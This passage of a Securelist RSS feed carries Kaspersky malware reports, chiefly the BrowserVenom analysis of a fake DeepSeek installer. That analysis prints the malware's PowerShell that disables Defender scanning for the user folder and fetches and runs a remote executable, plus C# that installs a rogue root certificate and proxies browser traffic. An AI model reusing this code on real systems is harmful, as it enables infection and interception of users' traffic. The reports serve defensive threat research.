  1217. <a href="https://opentip.kaspersky.com/https%3a%2f%2fc1mon-oss.oss-cn-hongkong.aliyuncs.com%2fj2a3swc2yasfq2/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4d017ccfbd63ae72&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://c1mon-oss.oss-cn-hongkong.aliyuncs[.]com/J2A3SWc2YASfQ2</a><br />
  1218. <a href="https://opentip.kaspersky.com/https%3a%2f%2ftbetter-oss.oss-cn-guangzhou.aliyuncs.com%2fip%2fjz24j7aycengykvf2/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ddedf3505162da6c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://tbetter-oss.oss-cn-guangzhou.aliyuncs[.]com/ip/JZ24J7aYCeNGyKVF2</a><br />
  1219. <a href="https://opentip.kaspersky.com/https%3a%2f%2fdata-sdk.oss-accelerate.aliyuncs.com%2ffile%2fsgtmnh951121/?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f56690db63e0ef13&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://data-sdk.oss-accelerate.aliyuncs[.]com/file/SGTMnH951121</a></p>
  1220. <h3 id="paths">Paths</h3>
  1221. <p>/sdcard/aray/cache/devices/.DEVICES</p>
  1222. ]]></content:encoded>
  1224. <wfw:commentRss>https://securelist.com/sparkkitty-ios-android-malware/116793/feed/</wfw:commentRss>
  1225. <slash:comments>0</slash:comments>
  1228. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23070415/SL-SparkKitty-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
  1229. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23070415/SL-SparkKitty-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  1230. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23070415/SL-SparkKitty-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  1231. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23070415/SL-SparkKitty-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1232. </item>
  1233. <item>
  1234. <title>Toxic trend: Another malware threat targets DeepSeek</title>
  1235. <link>https://securelist.com/browservenom-mimicks-deepseek-to-use-malicious-proxy/115728/</link>
  1236. <comments>https://securelist.com/browservenom-mimicks-deepseek-to-use-malicious-proxy/115728/#respond</comments>
  1238. <dc:creator><![CDATA[Lisandro Ubiedo]]></dc:creator>
  1239. <pubDate>Wed, 11 Jun 2025 10:00:50 +0000</pubDate>
  1240. <category><![CDATA[GReAT research]]></category>
  1241. <category><![CDATA[Malware Technologies]]></category>
  1242. <category><![CDATA[Microsoft Windows]]></category>
  1243. <category><![CDATA[Google Chrome]]></category>
  1244. <category><![CDATA[JavaScript]]></category>
  1245. <category><![CDATA[Malware Descriptions]]></category>
  1246. <category><![CDATA[Malware]]></category>
  1247. <category><![CDATA[Encryption]]></category>
  1248. <category><![CDATA[CAPTCHA]]></category>
  1249. <category><![CDATA[PowerShell]]></category>
  1250. <category><![CDATA[Browser]]></category>
  1251. <category><![CDATA[Phishing websites]]></category>
  1252. <category><![CDATA[Defense evasion]]></category>
  1253. <category><![CDATA[LLM]]></category>
  1254. <category><![CDATA[AI]]></category>
  1255. <category><![CDATA[DeepSeek]]></category>
  1256. <category><![CDATA[Windows malware]]></category>
  1257. <category><![CDATA[Web threats]]></category>
  1258. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=115728</guid>
  1259.  
  1260. <description><![CDATA[Kaspersky GReAT experts discovered a new malicious implant: BrowserVenom. It enables a proxy in browsers like Chrome and Mozilla and spreads through a DeepSeek-mimicking phishing website.]]></description>
  1261. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/11094352/browservenom-deepseek-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2>
  1262. <p>DeepSeek-R1 is one of the most popular LLMs right now. Users of all experience levels look for chatbot websites on search engines, and threat actors have started abusing the popularity of LLMs. We previously <a href="https://securelist.com/backdoors-and-stealers-prey-on-deepseek-and-grok/115801/" target="_blank" rel="noopener">reported attacks with malware</a> being spread under the guise of DeepSeek to attract victims. The malicious domains spread through X posts and general browsing.</p>
  1263. <p>But lately, threat actors have begun using malvertising to exploit the demand for chatbots. For instance, we have recently discovered a new malicious campaign distributing previously unknown malware through a fake DeepSeek-R1 LLM environment installer. The malware is delivered via a phishing site that masquerades as the official DeepSeek homepage. The website was promoted in the search results via Google Ads. The attacks ultimately aim to install <strong>BrowserVenom</strong>, an implant that reconfigures all browsing instances to force traffic through a proxy controlled by the threat actors. This enables them to manipulate the victim&#8217;s network traffic and collect data.</p>
  1264. <h2 id="phishing-lure">Phishing lure</h2>
  1265. <p>The infection was launched from a phishing site, located at <code>https[:]//deepseek-platform[.]com</code>. It was spread via malvertising, intentionally placed as the top result when a user searched for &#8220;deepseek r1&#8221;, thus taking advantage of the model&#8217;s popularity. Once the user reaches the site, a check is performed to identify the victim&#8217;s operating system. If the user is running Windows, they will be presented with only one active button, &#8220;Try now&#8221;. We have also seen layouts for other operating systems with slight changes in wording, but all mislead the user into clicking the button.</p>
  1266. <div id="attachment_116767" style="width: 1884px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116767" class="size-full wp-image-116767" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1.png" alt="Malicious website mimicking DeepSeek" width="1874" height="2048" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1.png 1874w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1-275x300.png 275w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1-937x1024.png 937w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1-768x839.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1-1406x1536.png 1406w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1-320x350.png 320w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1-740x809.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1-256x280.png 256w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10104807/browservenom-mimicks1-800x874.png 800w" sizes="auto, (max-width: 1874px) 100vw, 1874px" /></a><p id="caption-attachment-116767" class="wp-caption-text">Malicious website mimicking DeepSeek</p></div>
  1267. <p>Clicking this button will take the user to a CAPTCHA anti-bot screen. The code for this screen is obfuscated JavaScript, which performs a series of checks to make sure that the user is not a bot. We found other scripts on the same malicious domain signaling that this is not the first iteration of such campaigns. After successfully solving the CAPTCHA, the user is redirected to the <code>proxy1.php</code> URL path with a &#8220;Download now&#8221; button. Clicking that results in downloading the malicious installer named <code>AI_Launcher_1.21.exe</code> from the following URL: <code>https://r1deepseek-ai[.]com/gg/cc/AI_Launcher_1.21.exe</code>.</p>
  1268. <p>We examined the source code of both the phishing and distribution websites and discovered comments in Russian related to the websites&#8217; functionality, which suggests that they are developed by Russian-speaking threat actors.</p>
  1269. <h2 id="malicious-installer">Malicious installer</h2>
  1270. <p>The malicious installer <code>AI_Launcher_1.21.exe</code> is the launcher for the next-stage malware. Once this binary is executed, it opens a window that mimics a Cloudflare CAPTCHA.</p>
  1271. <div id="attachment_116768" style="width: 1290px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116768" class="size-full wp-image-116768" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2.png" alt="The second fake CAPTCHA" width="1280" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2.png 1280w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2-300x240.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2-1024x819.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2-768x614.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2-500x400.png 500w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2-438x350.png 438w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2-740x592.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2-350x280.png 350w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110326/browservenom-mimicks2-800x640.png 800w" sizes="auto, (max-width: 1280px) 100vw, 1280px" /></a><p id="caption-attachment-116768" class="wp-caption-text">The second fake CAPTCHA</p></div>
  1272. <p>This is another fake CAPTCHA that is loaded from <code>https[:]//casoredkff[.]pro/captcha</code>. After the checkbox is ticked, the URL is appended with <code>/success</code>, and the user is presented with the following screen, offering the options to download and install Ollama and LM Studio.</p>
  1273. <div id="attachment_116769" style="width: 2058px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116769" class="size-full wp-image-116769" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3.png" alt="Two options to install abused LLM frameworks" width="2048" height="924" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3-300x135.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3-1024x462.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3-768x347.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3-1536x693.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3-776x350.png 776w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3-740x334.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3-621x280.png 621w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/10110438/browservenom-mimicks3-800x361.png 800w" sizes="auto, (max-width: 2048px) 100vw, 2048px" /></a><p id="caption-attachment-116769" class="wp-caption-text">Two options to install abused LLM frameworks</p></div>
  1274. <p>Clicking either of the &#8220;Install&#8221; buttons effectively downloads and executes the respective installer, but with a caveat: another function runs concurrently: <code>MLInstaller.Runner.Run()</code>. This function triggers the infectious part of the implant.</p><pre class="urvanov-syntax-highlighter-plain-tag">private async void lmBtn_Click(object sender, EventArgs e)
  1275. {
  1276. try
  1277. {
  1278. MainFrm.&lt;&gt;c__DisplayClass5_0 CS$&lt;&gt;8__locals1 = new MainFrm.&lt;&gt;c__DisplayClass5_0();
  1279. this.lmBtn.Text = "Downloading..";
  1280. this.lmBtn.Enabled = false;
  1281. Action action;
  1282. if ((action = MainFrm.&lt;&gt;O.&lt;0&gt;__Run) == null)
  1283. {
  1284. action = (MainFrm.&lt;&gt;O.&lt;0&gt;__Run = new Action(Runner.Run));  # &lt;--- malware initialization
  1285. }
  1286. Task.Run(action);
  1287. CS$&lt;&gt;8__locals1.ollamaPath = Path.Combine(Path.GetTempPath(), "LM-Studio-0.3.9-6-x64.exe");
  1288. [...]</pre><p>
  1289. When the <code>MLInstaller.Runner.Run()</code> function is executed in a separate thread on the machine, the infection develops in the following three steps:</p>
  1290. <ol>
  1291. <li>
  1292. First, the malicious function tries to exclude the user&#8217;s folder from Windows Defender&#8217;s protection by decrypting a buffer using the AES encryption algorithm.</p>
  1293. <p>The AES encryption information is hardcoded in the implant:</p>
  1294. <table>
  1295. <tbody>
  1296. <tr>
  1297. <td><strong>Type</strong></td>
  1298. <td>AES-256-CBC</td>
  1299. </tr>
  1300. <tr>
  1301. <td><strong>Key</strong></td>
  1302. <td>01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20</td>
  1303. </tr>
  1304. <tr>
  1305. <td><strong>IV</strong></td>
  1306. <td>01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10</td>
  1307. </tr>
  1308. </tbody>
  1309. </table>
  1310. <p>The decrypted buffer contains a PowerShell command that performs the exclusion once executed by the malicious function.</p><pre class="urvanov-syntax-highlighter-plain-tag">powershell.exe -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $USERPROFILE</pre><p>
  1311. It should be noted that this command needs administrator privileges and will fail in case the user lacks them.
  1312. </li>
  1313. <li>
  1314. After that, another PowerShell command runs, downloading an executable from a malicious domain whose name is derived with a simple domain generation algorithm (DGA). The downloaded executable is saved as <code>%USERPROFILE%\Music\1.exe</code> under the user&#8217;s profile and then executed.</p><pre class="urvanov-syntax-highlighter-plain-tag">$ap = "/api/getFile?fn=lai.exe";
  1315. $b = $null;
  1316. foreach($i in 0..1000000) {
  1317.    $s = if ($i - gt 0)  {
  1318.        $i
  1319.    } else {
  1320.        ""
  1321.    };
  1322.    $d = "https://app-updater$s.app$ap";
  1323.    $b = (New - Object Net.WebClient).DownloadData($d);
  1324.    if ($b)  {
  1325.        break
  1326.    }
  1327.  
  1328. };
  1329. if ([Runtime.InteropServices.RuntimeEnvironment]::GetSystemVersion()  - match"^v2")  {
  1330.    [IO.File]::WriteAllBytes("$env:USERPROFILE\Music\1.exe", $b);
  1331.    Start - Process "$env:USERPROFILE\Music\1.exe"  - NoNewWindow
  1332. } else {
  1333.    ([Reflection.Assembly]::Load($b)).EntryPoint.Invoke($null, $null)
  1334. }</pre><p>
  1335. At the moment of our research, there was only one domain in existence: <code>app-updater1[.]app</code>. No binary can be downloaded from this domain as of now but we suspect that this might be another malicious implant, such as a backdoor for further access. So far, we have managed to obtain several malicious domain names associated with this threat; they are highlighted in the IoCs section.
  1336. </li>
  1337. <li>
  1338. Then the <code>MLInstaller.Runner.Run()</code> function locates a hardcoded stage two payload in the class and variable <code>ConfigFiles.load</code> of the malicious installer&#8217;s buffer. This executable is decrypted with the same AES algorithm as before in order to be loaded into memory and run.
  1339. </li>
  1340. </ol>
  1341. <h2 id="loaded-implant-browservenom">Loaded implant: BrowserVenom</h2>
  1342. <p>We dubbed the next-stage implant <strong>BrowserVenom</strong> because it reconfigures all browsing instances to force traffic through a proxy controlled by the threat actors. This enables them to sniff sensitive data and monitor the victim&#8217;s browsing activity while decrypting their traffic.</p>
  1343. <p>First, BrowserVenom checks if the current user has administrator rights – exiting if not – and installs a hardcoded certificate created by the threat actor:</p><pre class="urvanov-syntax-highlighter-plain-tag">[...]
  1344. X509Certificate2 x509Certificate = new X509Certificate2(Resources.cert);
  1345. if (RightsChecker.IsProcessRunningAsAdministrator())
  1346. {
  1347. StoreLocation storeLocation = StoreLocation.LocalMachine;
  1348. X509Store x509Store = new X509Store(StoreName.Root, storeLocation);
  1349. x509Store.Open(OpenFlags.ReadWrite);
  1350. x509Store.Add(x509Certificate);
  1351. [...]</pre><p>
  1352. Then the malware adds a hardcoded proxy server address to all currently installed and running browsers. For Chromium-based instances (i.e., Chrome or Microsoft Edge), it adds the <code>proxy-server</code> argument and modifies all existent LNK files, whereas for Gecko-based browsers, such as Mozilla or Tor Browser, the implant modifies the current user&#8217;s profile preferences:</p><pre class="urvanov-syntax-highlighter-plain-tag">[...]
  1353. new ChromeModifier(new string[]
  1354. {
  1355. "chrome.exe", "msedge.exe", "opera.exe", "brave.exe", "vivaldi.exe", "browser.exe", "torch.exe", "dragon.exe", "iron.exe", "epic.exe",
  1356. "blisk.exe", "colibri.exe", "centbrowser.exe", "maxthon.exe", "coccoc.exe", "slimjet.exe", "urbrowser.exe", "kiwi.exe"
  1357. }, string.Concat(new string[]
  1358. {
  1359. "--proxy-server=\"",
  1360. ProfileSettings.Host,
  1361. ":",
  1362. ProfileSettings.Port,
  1363. "\""
  1364. })).ProcessShortcuts();
  1365. GeckoModifier.Modify();
  1366. [...]</pre><p>
  1367. The settings currently utilized by the malware are as follows:</p><pre class="urvanov-syntax-highlighter-plain-tag">public static readonly string Host = "141.105.130[.]106";
  1368. public static readonly string Port = "37121";
  1369. public static readonly string ID = "LauncherLM";
  1370. public static string HWID = ChromeModifier.RandomString(5);</pre><p>
  1371. The variables <code>Host</code> and <code>Port</code> are the ones used as the proxy settings, and the <code>ID</code> and <code>HWID</code> are appended to the browser&#8217;s User-Agent, possibly as a way to keep track of the victim&#8217;s network traffic.</p>
  1372. <h2 id="conclusion">Conclusion</h2>
  1373. <p>As <a href="https://securelist.com/tag/deepseek/" target="_blank" rel="noopener">we have been reporting</a>, DeepSeek has been the perfect lure for attackers to attract new victims. Threat actors&#8217; use of new malicious tooling, such as BrowserVenom, complicates the detection of their activities. This, combined with the use of Google Ads to reach more victims and look more plausible, makes such campaigns even more effective.</p>
  1374. <p>At the time of our research, we detected multiple infections in Brazil, Cuba, Mexico, India, Nepal, South Africa, and Egypt. The nature of the bait and the geographic distribution of attacks indicate that campaigns like this continue to pose a global threat to unsuspecting users.</p>
  1375. <p>To protect against these attacks, users are advised to confirm that the results of their searches are official websites, along with their URLs and certificates, to make sure that the site is the right place to download the legitimate software from. Taking these precautions can help avoid this type of infection.</p>
  1376. <p>Kaspersky products detect this threat as <code>HEUR:Trojan.Win32.Generic</code> and <code>Trojan.Win32.SelfDel.iwcv</code>.</p>
  1377. <h2 id="indicators-of-compromise">Indicators of Compromise</h2>
  1378. <h3 id="hashes">Hashes</h3>
  1379. <p><a href="https://opentip.kaspersky.com/d435a9a303a27c98d4e7afa157ab47de/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______235b5c745a7b1f1d&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">d435a9a303a27c98d4e7afa157ab47de</a>  AI_Launcher_1.21.exe<br />
  1380. <a href="https://opentip.kaspersky.com/dc08e0a005d64cc9e5b2fdd201f97fd6/results?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______a1bb6d16148b88eb&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">dc08e0a005d64cc9e5b2fdd201f97fd6</a></p>
  1381. <h3 id="domains-and-ips">Domains and IPs</h3>
  1382. <table>
  1383. <tbody>
  1384. <tr>
  1385. <td><a href="https://opentip.kaspersky.com/deepseek-platform.com/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______eed927492d26acd3&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">deepseek-platform[.]com</a></td>
  1386. <td>Main phishing site</td>
  1387. </tr>
  1388. <tr>
  1389. <td><a href="https://opentip.kaspersky.com/r1deepseek-ai.com/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______2150c37d57701b12&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">r1deepseek-ai[.]com</a></td>
  1390. <td>Distribution server</td>
  1391. </tr>
  1392. <tr>
  1393. <td><a href="https://opentip.kaspersky.com/app-updater1.app/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______d6653806f231fd05&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">app-updater1[.]app</a></td>
  1394. <td rowspan="3">Stage #2 servers</td>
  1395. </tr>
  1396. <tr>
  1397. <td><a href="https://opentip.kaspersky.com/app-updater2.app/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______603b0cc1992e91cb&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">app-updater2[.]app</a></td>
  1398. </tr>
  1399. <tr>
  1400. <td><a href="https://opentip.kaspersky.com/app-updater.app/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______262fdc00828be6d6&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">app-updater[.]app</a></td>
  1401. </tr>
  1402. <tr>
  1403. <td><a href="https://opentip.kaspersky.com/141.105.130.106/?icid=gl_securelist_acq_ona_smm__onl_b2c_securelist_lnk_sm-team_______6597cebfec71a013&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">141.105.130[.]106</a></td>
  1404. <td>Malicious proxy</td>
  1405. </tr>
  1406. </tbody>
  1407. </table>
  1408. ]]></content:encoded>
  1410. <wfw:commentRss>https://securelist.com/browservenom-mimicks-deepseek-to-use-malicious-proxy/115728/feed/</wfw:commentRss>
  1411. <slash:comments>0</slash:comments>
  1414. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/11094352/browservenom-deepseek-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
  1415. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/11094352/browservenom-deepseek-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  1416. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/11094352/browservenom-deepseek-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  1417. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/11094352/browservenom-deepseek-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1418. </item>
  1419. <item>
  1420. <title>Sleep with one eye open: how Librarian Ghouls steal data by night</title>
  1421. <link>https://securelist.com/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto/116536/</link>
  1422. <comments>https://securelist.com/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto/116536/#respond</comments>
  1424. <dc:creator><![CDATA[Kaspersky]]></dc:creator>
  1425. <pubDate>Mon, 09 Jun 2025 10:00:09 +0000</pubDate>
  1426. <category><![CDATA[APT reports]]></category>
  1427. <category><![CDATA[Malware Technologies]]></category>
  1428. <category><![CDATA[Targeted attacks]]></category>
  1429. <category><![CDATA[Malware Descriptions]]></category>
  1430. <category><![CDATA[Spear phishing]]></category>
  1431. <category><![CDATA[Malware]]></category>
  1432. <category><![CDATA[APT]]></category>
  1433. <category><![CDATA[PowerShell]]></category>
  1434. <category><![CDATA[Miner]]></category>
  1435. <category><![CDATA[XMRig]]></category>
  1436. <category><![CDATA[WinRAR]]></category>
  1437. <category><![CDATA[Microsoft Edge]]></category>
  1438. <category><![CDATA[APT (Targeted attacks)]]></category>
  1439. <category><![CDATA[Windows malware]]></category>
  1440. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=116536</guid>
  1441.  
  1442. <description><![CDATA[According to Kaspersky, Librarian Ghouls APT continues its series of attacks on Russian entities. A detailed analysis of a malicious campaign utilizing RAR archives and BAT scripts.]]></description>
  1443. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/27094643/librarian-ghouls-featured-image-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2>
  1444. <p>Librarian Ghouls, also known as &#8220;Rare Werewolf&#8221; and &#8220;Rezet&#8221;, is an APT group that targets entities in Russia and the CIS. Other security vendors are also monitoring this APT and releasing analyses of its campaigns. The group has remained active through May 2025, consistently targeting Russian companies.</p>
  1445. <p>A distinctive feature of this threat is that the attackers favor using legitimate third-party software over developing their own malicious binaries. The malicious functionality of the campaign described in this article is implemented through command files and PowerShell scripts. The attackers establish remote access to the victim&#8217;s device, steal credentials, and deploy an XMRig crypto miner in the system.</p>
  1446. <p>Our research has uncovered new tools within this APT group&#8217;s arsenal, which we will elaborate on in this article.</p>
  1447. <h2 id="technical-details">Technical details</h2>
  1448. <h3 id="initial-infection-vector">Initial infection vector</h3>
  1449. <p>Attacks by Librarian Ghouls continued almost unabated throughout 2024. We observed a slight decline in the group&#8217;s activity in December, followed immediately by a new wave of attacks, which is ongoing. The group&#8217;s primary initial infection vector involves targeted phishing emails that contain password-protected archives with executable files inside. These malicious emails are typically disguised as messages from legitimate organizations, containing attachments that appear to be official documents. The infection process is as follows: the victim opens the attached archive (the password is usually provided in the email body), extracts the files inside, and opens them.</p>
  1450. <p>We managed to get hold of a malicious implant from an archive disguised as a payment order. The sample is a self-extracting installer made with the Smart Install Maker utility for Windows.</p>
  1451. <p>The installer contains three files: an archive, a configuration file, and an empty file irrelevant for our analysis. They are later renamed into <code>data.cab</code>, <code>installer.config</code> and <code>runtime.cab</code> respectively.</p>
  1452. <p>The primary malicious logic resides in the installer&#8217;s configuration file. It uses a variety of registry modification commands to automatically deploy the legitimate window manager, 4t Tray Minimizer, onto the system. This software can minimize running applications to the system tray, allowing attackers to obscure their presence on the compromised system.</p>
  1453. <p>Once 4t Tray Minimizer is installed, the installer pulls three files from <code>data.cab</code> and puts them into the <code>C:\Intel</code> directory, specifically at:</p>
  1454. <table>
  1455. <tbody>
  1456. <tr>
  1457. <td><strong>File</strong></td>
  1458. <td><strong>Name when archived</strong></td>
  1459. <td><strong>Path on the infected system</strong></td>
  1460. </tr>
  1461. <tr>
  1462. <td>Legitimate PDF as a decoy</td>
  1463. <td>0</td>
  1464. <td> \Intel\Payment Order # 131.pdf</td>
  1465. </tr>
  1466. <tr>
  1467. <td>Legitimate curl utility executable</td>
  1468. <td>1</td>
  1469. <td>\Intel\curl.exe</td>
  1470. </tr>
  1471. <tr>
  1472. <td>LNK file</td>
  1473. <td>2</td>
  1474. <td>\Intel\AnyDesk\bat.lnk</td>
  1475. </tr>
  1476. </tbody>
  1477. </table>
  1478. <p>The PDF decoy resembles an order to pay a minor amount:</p>
  1479. <div id="attachment_116537" style="width: 711px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15155659/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto1.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116537" class="size-full wp-image-116537" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15155659/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto1.png" alt="PDF document imitating a payment order" width="701" height="863" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15155659/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto1.png 701w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15155659/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto1-244x300.png 244w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15155659/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto1-284x350.png 284w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15155659/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto1-227x280.png 227w" sizes="auto, (max-width: 701px) 100vw, 701px" /></a><p id="caption-attachment-116537" class="wp-caption-text">PDF document imitating a payment order</p></div>
  1480. <h3 id="rezet-cmd">rezet.cmd</h3>
  1481. <p>Once <code>data.cab</code> is unpacked, the installer generates and executes a <code>rezet.cmd</code> command file, which then reaches out to the C2 server <code>downdown[.]ru</code>, hosting six files with the JPG extension. <code>rezet.cmd</code> downloads these to <code>C:\Intel</code>, changing their file extensions to: <code>driver.exe</code>, <code>blat.exe</code>, <code>svchost.exe</code>, <code>Trays.rar</code>, <code>wol.ps1</code>, and <code>dc.exe</code>.</p>
  1482. <ul>
  1483. <li><code>driver.exe</code> is a customized build of <code>rar.exe</code>, the console version of WinRAR 3.80. This version has had user dialog strings removed: it can execute commands but provides no meaningful output to the console.</li>
